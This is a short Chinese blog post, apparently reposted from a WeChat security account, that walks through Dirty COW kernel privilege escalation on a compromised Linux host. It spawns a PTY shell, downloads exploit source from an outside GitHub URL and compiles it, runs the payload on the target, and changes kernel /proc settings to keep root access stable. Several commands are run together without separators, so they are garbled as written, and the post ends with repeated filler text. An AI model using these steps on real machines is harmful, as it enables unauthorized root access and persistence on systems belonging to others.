基本概述
有时候我们在使用脏牛提权后会出现权限不稳定容易掉的情况,本篇文章主要提供一种解决方法
操作流程
获取shell之后为了便于操作我们这里更改交互式shell为pty类型:
python3 -c "import pty;pty.spawn('/bin/bash')"
从上面可以看到这里并非root用户,所以我们下一步需要进行一次权限提升,之后查看内核版本——4.4.0-21-generic
uname -a
发现在影响范围内,所以之后我们使用脏牛进行提权:
curl https://raw.githubusercontent.com/sqlnetcat/dirtycow-mem/master/dirtycow-mem.c > test.cgcc -Wall -o test test.c -ldl -lpthread
之后上传编译好的文件到目标主机:
之后执行载荷,进行权限提升:
之后保持利用稳定
echo 0 > /proc/sys/vm/dirty_writeback_centisecsecho 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn
之后就可以平稳的进行你的后续高权限操作了~
凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字
原文始发于微信公众号(七芒星实验室):脏牛提权实现稳定性
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论